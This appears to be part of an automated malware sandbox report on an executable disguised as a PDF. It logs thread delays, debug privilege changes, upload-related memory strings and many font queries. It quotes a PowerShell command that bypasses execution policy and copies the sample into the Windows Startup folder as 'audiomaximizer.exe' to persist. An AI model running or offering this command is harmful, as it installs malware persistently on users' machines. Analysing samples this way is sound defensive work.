Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595794
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594484

Source: audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd34928e143909LR^q\
Source: svchost.exe, 00000004.00000002.3333450427.000002362DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3334978982.0000023633054000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4127932595.0000000001607000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd348fc5d06ecdLR^q
Source: audiomaximizer.exe, 00000008.00000002.4127969690.0000000001356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -command copy-item 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -command copy-item 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe'			Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
